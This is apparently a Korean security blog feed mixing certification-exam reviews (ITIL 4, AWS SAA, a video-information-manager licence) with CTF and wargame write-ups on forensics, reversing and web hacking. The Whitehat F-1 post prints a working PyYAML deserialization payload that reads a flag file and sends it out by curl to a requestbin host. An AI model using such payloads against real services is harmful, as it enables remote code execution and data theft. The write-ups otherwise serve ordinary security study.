보안맨

[ITIL V4 Foundation] 시험정보 / 접수방법 / 후기 / 공부방법

SecurityMan — Tue, 28 Oct 2025 10:55:50 +0900

2025년 9월 취득한 ITIL V4 Foundation 자격증

40문제중 1문제를 틀려서 98% 점수로 합격했다

시험이 종료되면 바로 pdf 성적표를 받아볼수있다.

IT 서비스 관리 분야에서 가장 널리 알려진 국제 자격 중 하나인 ITIL V4 Foundation.

영국 AXELOS에서 인증하고 PeopleCert에서 시험을 주관하는 자격으로,
IT 서비스의 설계/운영/개선 전 과정에 걸친 서비스 관리 체계의 이해도를 평가한다.

ITIL(Information Technology Infrastructure Library)은
조직이 IT 서비스를 비즈니스 요구사항에 맞게 효율적으로 운영하기 위한
프레임워크이자 베스트 프랙티스를 다룬다.

그중 Foundation 레벨은 가장 기초적인 단계로,
서비스 관리의 핵심 개념, 4P(Principles, Practices, Partners, Products) 구조,
그리고 Service Value System(SVS) 전반에 대한 이해를 평가한다.

응시 자격에는 별도 제한이 없다.
IT 서비스 관리, 운영, 프로젝트, 보안 등 관련 업무 종사자라면 누구나 응시 가능하다.
시험은 PeopleCert 플랫폼을 통한 온라인 감독(Online Proctored Exam) 방식으로 진행된다.
시험 전 웹캠, 마이크, 네트워크 환경을 점검하고, 감독관이 실시간으로 응시 과정을 모니터링한다.

시험 구성은 아래와 같다.

문항 수: 40문항 (모두 객관식)
시험 시간: 60분 (영어가 모국어가 아닐경우 15분 더 제공)
합격 기준: 65% 이상 (26문항 이상 정답)
시험 언어: 영어, 중국어, 프랑스어, 독일어, 스페인어, 일본어 등 (한국어 안됨)

한국어 지원이 안된다는것이 큰 압박인데

다행히 시험문제가 거의 문제은행에서 나오고

문제들이 간단간단해서 몇번 반복하면 굳이 해석하지 않아도

답을 찾을수 있는 경지에 오르게 된다.

ITIL 4 Foundation

Rescheduling an exam up to 48 hours before its start time is free. Rescheduling at a later stage is subject to additional charges. A fee of USD 60 / EUR70 / GBP 60 / AUD 85 / JPY 6815 (depending on country/currency, plus tax where applicable) will be charg

www.peoplecert.org

시험접수는 기본적으로 peoplecert 홈페이지에서 하는데

여기서 바로 접수해버리면

무려 669달러를 내야한다.

쓸모없는 ebook과 learning resource kit가 포함되어 있는데

이거 뺄수도 없다

ITIL® 4 Foundation Exam voucher - PassionIT Group [30% Off]

The ITIL® 4 Foundation Exam voucher allows you to sit for the ITIL® Foundation certification exam. The exam voucher is for a PeopleCert take anywhere/anytime exam.

www.passionitgroup.com

요즘같은 환율에 조금이라도 아껴보고자

PASSIONIT GROUP에서 시험접수를 하면 더 저렴하게 할수있다는것을 알아냈다.

여기는 바우처가 699달러로 30달러 비싸게 나왔지만

재시험 옵션과 셀프 트레이닝 옵션을

No Thank You 체크하면 499달러로 떨어진다

결제하면 이렇게

바우처 코드가 포함된 이메일이 날아온다.

요즘 환율로 약 70만원.. 어마어마한 금액이다

이 바우처 코드를 어디에 입력해야하는지 몰라서 엄청 헤맸는데

여기 결제화면에 있는 I HAVE A PROMO CODE 부분이 입력하는게 아니라

여기 Overview 에 있는

Redeem your voucher 에 입력하면 된다.

그럼 시험 접수할수 있는 메뉴가 나오고,

거기서 원하는 시간대에 시험을 예약한 후

예약한 시간에 맞춰 접속하면 된다.

하기전에 웹캠이랑 스피커, 마이크 체크는 반드시 하고가는게 좋다.

경험상 CISA 시험칠때 온라인 감독보다

감독관이 훨씬 유한거 같다.

공부는 약 한달정도

흔히 구할수 있는 덤프와 Udemy 에서 제공하는 모의고사, ITIL 공부 앱(무료)를 사용했다.

사실 Udemy와 ITIL앱이 무슨 의미가 있나 싶을정도로

99%문제가 덤프랑 똑같이 나왔다.

Udemy 에서 제공하는 모의고사는 굉장히 어려워서

한번 풀어봤다가 당황해서 시험 공부 기간을 연장했는데

그럴 필요가 없었다

그냥 덤프가 짱이다.

ITIL V4 Foundation 자격증은 유효기간이 없다고 들었는데

사실 있었다.

3년의 유효기간이 주어지며

매년 5만큼의 CPD를 입력해야 자격이 유지된다.

근데 웃긴게

CPD를 입력하려면 맴버십 가입을 필수적으로 해야한다

비용은 매년 129달러... 약 20만원가까이 매년 지출이 발생한다

결국 갱신하려면 60만원이 필요하다는 뜻

자격증에 돈 아끼지 말자는 주의지만

이건 좀 고민되긴 한다.

가성비 좋게 가려면 상위 자격증을 더 따는게 나을까 싶긴한데

이건 좀더 고민이 필요할것 같다.

어쨌든 이번 공부를 통해

운영 관점에서 서비스 품질을 어떻게 정의하고 통제해야 하는가에 대한 내용을

배울 수 있는 계기가 되었다.

[영상정보관리사] 시험정보 / 후기 / 공부방법

SecurityMan — Sun, 26 Oct 2025 20:09:22 +0900

2025년 7월 합격한 영상정보관리사 자격증

한국정보통신자격협회에서 발급하는

국가공인 민간자격이다.

상정보처리기기(CCTV, 드론영상 등)에서 수집되는 영상정보를 관리 및 보호하고,

지능형 영상정보관제시스템을 모니터링‧운용할 수 있는 관제능력을 평가하는 자격증으로,

2024년 11월 28일부로 국가공인 자격으로 지정되었다.

내가 알기론 개인정보보호위원회에서 처음으로 공인한 자격증인데

대체 왜 아직까지 개인정보 관련 국가공인 자격증이 없는지는 모르겠다.

응시 자격엔 별도 제한이 없고

검정료는 7만 5천원으로 상당히 비싼 편이다.

검정과목은 크게 아래와 같이 세가지로 나눈다

영상정보 관리일반
영상정보 관제시스템
영상정보 관리 실무

필기/실기가 구분되어 있으나, 동일한 시험일에 필기/실기를 모두 응시하는 구조이다.

필기는 총 40문항이고 40분 제한시간,

실기는 총 13문항이며 역시 40분의 제한시간을 가진다.

시험칠때는 실기문제를 먼저 풀고나서 필기 시험이 진행된다.

필기 실기를 모두 40정 이상 득점하고, 두 과목 평균이 60점 이상이어야 합격이다.

시험공부는 성안당에서 출판한

CCTV 영상관제 전문가를 위한 영상정보관리사 책을 이용했다.

결론부터 말하면 이 책은 비추다

저지의 전문성이 의심되는 수준이다.

그냥 대충 시험범위 같이 보이는건 두서없이 다 때려넣어놔서

불필요한 내용과 중복되는 내용이 너무 많다.

그것들만 없애도 책 두께가 3분의 1은 될듯

표지에 써있는 '과목별 핵심 정리' 라는 말을 보고 양심이 없다고 생각했다.

원래 자격증 공부할때 이론을 3~4회독 하고 기출문제를 풀어보는 편인데

이론 몇장 넘겨보고 답도 없겠다 싶어서 그냥 바로 기출만 돌렸다.

자료실 1 페이지 | (사)한국정보통신자격협회

www.icqa.or.kr

IQCA 홈페이지에서 영상정보관리사 관련 기출문제와 자료, 예제 프로그램을 제공하니

시험전에 한번 해보고 가면 좋다.

필기는 사실 어느 시험이 그렇듯 기출만 풀어서 외우고 가면 무난하고

실기도 눈과 손만 있다면 풀수 있는 수준이다.

CCTV 영상 분석해서 답을 찾는 문제나

컴퓨터 IP, 이름 설정하는 문제

CCTV 관제 프로그램 관련 문제

개인정보보호법 문제

대충 이런 흐름으로 나오는데

개보법만 조금 공부하면 모두가 무난하게 풀수있다.

정 걱정되면 예재 프로그램 한번 해보면 된다.

어려운 시험은 아니니

1~2주 정도 가볍게 준비하면 충분히 합격할 수 있다.

[2022 화이트햇 콘테스트 본선] F-1- 웹해킹 / Python / YAML Command Injection

SecurityMan — Wed, 10 Apr 2024 11:00:21 +0900

2022 화이트햇 콘테스트 본선에 출제되었던 문제

이전 E-5 문제와 이어지는 문제이다.

(https://hackingstudypad.tistory.com/720)

F-1 문제에서는

D-2의 악성코드와 통신하는 서버에 취약점을 찾아 공격하고

플래그를 획득하는 것이 목표이다.

D-2 문제의 악성코드는

http://15.165.18.103/gmae 에서 다운받은

dd.exe 인데

무력화환 도구들을 실행시켰을 때

dd.exe 가 대신 실행되도록 하는것이었다.

dd.exe 가 실행되면

3.39.253.212 목적지로 어떤 값을 보내는데

그 값이 형태가 YAML 형식이었다.

또한 서버의 응답 헤더를 확인해 봤을때

Python 을 이용해 구동중인 것을 확인했다.

이 부분은 문제푸는데 정신이 없어서 캡쳐를 제대로 하지 못했다.

아무튼 그래서 PyYAML을 이용한 yaml command injection 을 시도해봤다.

import requests
import base64

url = 'http://3.39.253.212'

payload = '''
- !!python/object/new:tuple [!!python/object/new/map [!!python/name:eval , [
    'exec("import os; f=open(\\"/app/flag\\").read();os.system(\\"curl
    http://requestbin주소?a=\\"+f)")' ]]]
'''

payload = base64.b64encode(payload.encode())
data = []

for a in payload:
	data.append(c ^ 50)
data = bytes(data)

r = requests.post(url, data=dict(y=data))
print(r.text)

이런식으로

플래그의 위치인 /app/flag 의 내용을 읽어와서

curl 로 해당 내용을 a 파라미터에 담아 전송토록 했다.

base64 인코딩하고 50으로 xor 한것은

문제에서 동작하는 악성코드가 yaml 데이터를 보낼때

이런식으로 보내고 있었기 때문에 양식을 맞춘것이다.

그럼 이런식으로 /app/flag 이 base64 인코딩된 값으로 따라오는걸 볼 수 있다.

해당 값을 base64 디코딩해주면

플래그를 찾을 수 있다.

[AWS Certified Solutions Architect - Associate] 시험정보 / 후기 / 공부방법

SecurityMan — Thu, 4 Apr 2024 11:00:29 +0900

2024년 3월 취득한 AWS Certified Solutions Architect - Associate 자격증(SAA-C03)

AWS Cloud Practitioner 를 취득한 후 대략 1년 반 뒤에 취득했다.

해당 자격증은 AWS 에서 주관하고 있는 AWS 클라우드 관련 자격증이다.

AWS 홈페이지 : https://aws.amazon.com/ko/certification/?nc2=sb_ce_co

AWS 에서 주관하는 자격증이 총 12개가 있는데

Cloud Practitioner 는 그중 가장 쉬운 난이도의 자격증이고,

그것보다 한단계 위인 ASSOCIATE 레벨의 자격증 중

Solutions Architect 분야의 자격이다.

시험은 총 130분간 온라인으로 치뤄지고,

한번 응시하는데 150달러가 든다.

총 65개 문항으로 구성되어 있으며, 모두 객관식이고

기본적으로 4지선다인데 복수정답을 선택하는 문제가 일부 섞여있다.

2개를 선택하면 보기가 5개, 3개를 선택하면 보기가 6개 나온다.

컴퓨팅, 네트워킹, 스토리지 및 데이터베이스 AWS 서비스는 물론, AWS 배포 및 관리 서비스에 대한 지식과 기술
AWS에서 워크로드를 배포, 관리, 운영한 경험과 보안 제어 및 규정 준수 요구 사항 구현에 대한 지식과 기술
AWS Management Console 및 AWS Command Line Interface(CLI) 사용에 대한 지식 및 기술과 AWS Well-Architected Framework, AWS 네트워킹, 보안 서비스 및 AWS 글로벌 인프라에 대한 이해
주어진 기술 요구 사항에 부합하는 AWS 서비스를 식별하고 AWS 기반 애플리케이션의 기술 요구 사항을 정의하는 능력

AWS Certified Solutions Architect - Associate 는 위의 내용들을 검증한다.

도메인	시험비율
보안 아키텍처 설계	30%
복원력을 갖춘 아키텍처 설계	26%
고성능 아키텍처 설계	24%
비용에 최적화된 아키텍처 셜계	20%

시험에 나오는 도메인은 위와 같이 크게 4가지로 나누어진다.

시험 결과는 100 ~ 1,000 기준의 점수로 채점이 되고,

이중 720점 이상을 획득해야 시험에 합격할 수 있다.

이번에 공부할때도 역시

인프런에서 코드바나나님의

AWS Certified Solutions Architect - Associate 자격증 준비하기 강의를 들었다.

14만원에 올라와 있는데

연초에 할인을 엄청나게 하길래 바로 질러서 들었다.

인강을 들으면서 직접 AWS에서 관련 서비스를 따라 구성해보면서 들으니

이해도 확실히 더 잘됐된것 같다.

무엇보다 예상문제가 많이 제공되는데, 그걸 풀이하는 방법까지 자세하게 설명해주셔서 너무 좋았다.

AWS 시험 문제가 정답을 찾는 패턴 같은게 있는데

(문제에 이런 문구가 나오면 이게 답이다 같은..)

강의를 반복해서 듣다보면 그걸 찾을 수 있는 능력이 키워진는것 같다.

제공된 문제 중 동일한 문제도 몇개 시험에 똑같이 나와서 조금 수월했던것 같다.

하지만 지난 AWS Cloud Practicioner 와 달리이 강의에서 제공된 문제만으로는 한계가 있다.

https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&sec=prep

Self-paced digital training on AWS - AWS Skill Builder

Your learning center to build in-demand cloud skills. Skill Builder provides 500+ free digital courses, 25+ learning plans, and 19 Ramp-Up Guides to help you expand your knowledge. Courses cover more than 30 AWS solutions for various skill levels. Skill Bu

explore.skillbuilder.aws

https://d1.awsstatic.com/ko_KR/training-and-certification/docs-sa-assoc/AWS-Certified-Solutions-Architect-Associate_Sample-Questions.pdf

아무래도 한정된 강의에서 모든 문제 유형을 다루긴 힘들기 때문일 것인데,

보완하기 위해 AWS에서 제공하는 샘플문항과 공식 연습문제 집합을 풀어보는것이 도움이 된다.

그리고 구글에 검색하면 나오는덤프들...

아직 C03 덤프는 많이 없는것 같고 C02 덤프를 쉽게 찾을 수 있는데

C02로 공부해도 개념을 이해하고 있다면 크게 문제는 없는것 같다.

다만 덤프기 때문에 거기 써있는 정답을 확신하지 말고 비판적으로 봐야한다는것..

참고로 새로운 AWS 자격을 취득하면

기존에 취득했던 하위 자격증의 유효기간이 더 늘어나게 된다.

유효기간이 3년이니 2027년 되기 전에 다음 AWS를 노려보려고 한다.

[2022 화이트햇 콘테스트 본선] E-5- 포렌식 / Sysmon View / Powershell

SecurityMan — Sat, 30 Mar 2024 11:00:41 +0900

[E-5]
공격자가 가장 첫번째로 유출한 파일의 SHA1 해시는?

2022 화이트햇 콘테스트 본선에 출제되었던 문제

이전 E-4 문제와 이어지는 문제이다.

(https://hackingstudypad.tistory.com/718)

정신을 어디 뒀었는지

이번 문제화면도 역시 캡쳐를 못했다..

넘 아쉬운 부분..

Sysmon View 도구를 이용해

피해 윈도우 이미지의 sysmon 로그를 분석하다보면

powershell 실행기록 중 PID 가 4564인 로그를 찾을 수 있다.

BASE64 인코딩된 명령어가 실행되었는데

$base64EncodedString = "여기에_Base64_문자열_입력"; 
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64EncodedString))

위와 같은 파워쉘 스크립트로 디코딩을 할 수 있다.

디코딩을 해보면 이런 Powershell 스크립트가 나온다.

52.78.113.15를 목적지로

.png, .gif, .jpg 와 같은 특정 확장자를 가진 파일을 업로드하고 있는 모습이다.

확장자가 굉장히 많은데

이중에서 어떤 확장자를 가진 파일을 가장 먼저 가져왔을까를 알아내야 한다.

그냥 단순하게 침해사고 이미지에 들어가서

Powershell 창을 열어 똑같이 실행시켜 봤다.

그리고나서 $a 에 들어간 값을 확인했더니

Eula.txt 파일이 가장 먼저 보였다.

Certutil 명령어를 이용해서

해당 파일의 SHA1 해시값을 구해준뒤 제출했다.

이번 문제의 플래그는

FLAG{5ab806618497189342722d42dc382623ac3e1b55} 가 된다.

[SuNiNaTaS] Challenge11 - 리버싱 / Ollydbg

SecurityMan — Tue, 26 Mar 2024 11:00:14 +0900

SuNiNaTaS 에서 제공하는 열한번째 문제

리버싱으로 분류된 문제이다.

문제에서 주어지는 것은

Project1.exe 파일이다.

실행시켜보면

이렇게 Key 값을 찾으라는 문구와 함께

입력창이 있는 프로그램이 뜬다.

해당 프로그램을 분석하기 위해

올리디버거를 이용해 해당 프로그램을 열어주었다.

우선 가장 먼저

우클릭 - Search for - All referenced text strings 를 눌러서

스트링을 살펴보았다.

그랬더니

Congratulation! , Authkey : 라는 글자가 보였고

그 근처에서

2V, XS, B6, H1, 0F 가 적혀있는것이 보였다.

이게 뭔가 KEY 값일거 같아서 순서대로 붙혀서 넣어봤는데

답이 아닌것 같았다.

일단 2V 와 Authkey 부분에 F2를 눌러서

브레이크 포인트를 걸고 실행을 시켜보기로 했다.

실행을 시키면

브레이크포인트에서 프로그램이 멈추게 된다.

여기서 그냥 F7을 쭉 눌러서 프로그램을 진행시켜 보면

어느순간에 화면 오른쪽 하단에서

정렬된 KEY 값이 보이게 된다.

2V 부터 차례로 위로 올라가면서 적어주면 된다.

알맞은 Key 값을 입력하면

플래그인 Authkey를 찾을 수 있게 된다.

[2022 화이트햇 콘테스트 본선] E-4 - 포렌식 / IDA

SecurityMan — Fri, 22 Mar 2024 11:00:16 +0900

2022 화이트햇 콘테스트 본선에 출제되었던 문제

이전 E-3 문제와 이어지는 문제이다.

(https://hackingstudypad.tistory.com/716)

E-4 문제는

E-2에서 식별한 악성코드가

Injection 하는 악성 DLL을 분석하여 플래그를 획득하는 것이 목표이다.

E-2 에서 식별한 악성코드인

FXSSVC.dll 을 IDA로 분석하다 보면

System32 경로에 있는 splsrv64.dll 로 뭔가를 하고있는걸 볼 수 있다.

아마 이 파일이 Injection 대상일거라 생각해서

해당파일을 찾아

역시 IDA를 이용해 분석해보았다.

splsrv64.dll 을 분석해보면

어떤 값을 0x18로 xor 하여 szUrlName 에 담고있는것을 확인할 수 있다.

xor 하는 대상은

여기에 보이는 HEX 값들인데

a = b'cKLJT]VqkKLJYV_]6)(+7k}}yj{{pG^TY_'
out = []
for c in a:
	out.append(c ^ 0x18)
bytes(out)
    
b'{STRLENisSTRANGE.103/seearcch_FLAG'

해당 값들을

위와 같이 간단하게 다시 역으로

0x18 과 xor 해주면 된다.

그럼 순서가 뒤죽박죽인 플래그가 나오는데

잘 맞춰주면 된다.

이번 문제의 플래그는

FLAG{STRLENisSTRANGE} 였다.

[SuNiNaTaS] Challenge10 - 리버싱 / dnSpy

SecurityMan — Tue, 19 Mar 2024 11:00:16 +0900

SuNiNaTaS 에서 제공하는 열번째 문제

리버싱으로 분류된 문제이다.

문제페이지에 들어가면

문제파일을 다운로드 받을 수 있다.

다운로드 받으면

reversing.exe 파일을 볼 수 있다.

실행시켜보면 이런 화면이 나온다.

간단하게 비밀번호 같은거 입력하는 창이 나오는데

잘못된 값을 입력하면

이렇게 Try again! 이 나온다.

처음엔 IDA로 분석을 해보려했는데

Microsoft.NET assembly 파일인것 같아서

다른 도구를 사용해보기로 했다.

Releases · dnSpy/dnSpy

.NET debugger and assembly editor. Contribute to dnSpy/dnSpy development by creating an account on GitHub.

github.com

Microsoft.NET 일경우

dnSpy 라는 도구를 사용하면 편하다

따로 설치는 필요없고 압축만 풀어주면 된다.

dnSpy 를 실행시켜서

문제파일을 열어주면

WindowsFormsApplication3 라는 항목이 생긴다.

여기 하위항목의 Form1 부분을 찾아가면

이렇게 소스코드를 볼 수 있는데

친절하게도 가운데

비밀번호와(b) Authkey가 적혀있다.

해당 값으로 인증을하면 문제가 풀린다.

[2022 화이트햇 콘테스트 본선] E-3 - 포렌식 / Sysmon View

SecurityMan — Sat, 16 Mar 2024 11:00:55 +0900

2022 화이트햇 콘테스트 본선에 출제되었던 문제

이전 E-2 문제와 이어지는 문제이다.

(https://hackingstudypad.tistory.com/714)

E-3문제는

악성코드가 DLL Injection을 수행하는데

이때 Injection의 대상이 되는 정상 프로세스의 이름과

최초로 Attach 한 PPID가 무엇인지 알아내는것이 목표이다.

지난 문제에서

prob_b 이미지 내에 있는

FXSSVC.dll 악성코드를 식별했었다.

해당 악성코드는 파워쉘 코드를 통해

http://15.165.18.103/api 로부터 다운받은 것이었다.

IDA 도구를 이용해

FXSSVC.dll 파일을 열어 분석해보면

DLL Injection 대상 프로세스는

explorer.exe 임을 알아낼 수 있다.

sysmon view 도구를 이용해

prob_b 이미지에서 추출한 sysmon 로그를 분석해본다.

explorer.exe를 검색하면

sysmon 로그가 생성되어 있는게 보인다.

빨간 네모를 더블클릭해서

세부 내용을 확인해보면

거기서 PPID를 확인할 수 있다.

따라서 이번 문제의 플래그는

FLAG{EXPLORER.EXE_3904} 가 된다.

[SuNiNaTaS] Challenge9 - 리버싱 / IDA

SecurityMan — Wed, 13 Mar 2024 11:00:42 +0900

SuNiNaTaS 에서 제공하는 아홉번째 문제

리버싱으로 분류된 문제이다.

문제페이지에 들어가면

뭔가를 다운받도록 한다.

해당 파일은 zip 파일로

압축을 풀려면 비밀번호가 필요하다.

비번은 위에 나와있듯이 suninatas 이다.

안에는 Project1.exe 파일이 들어있다.

실행시키면 이렇게 작은 창이 뜬다.

뭔가를 입력하고 Click! 을 눌러봤는데

별다른 반응이 없었다.

IDA라는 디스어셈블러를 이용해 해당 파일을 분석해봤다.

함수 목록을 살펴보는데

TForm1_Button1Click 가 보였다.

아마도 실행창에서 보이는 버튼을 눌렀을 때 실행되는 함수일 것이다.

해당 함수에 들어가서 f5를 눌러 수도코드를 살펴본다.

뭔가를 비교한 다음에 참이되면 Congratulation! 이라는 메세지 박스가 뜨게 된다.

비교대상인 str_XXXXXX (까만색 칠해진 부분) 을 클릭해 보면

숨겨진 코드를 찾을 수 있다.

해당 코드를 입력하면

문제를 해결할 수 있다.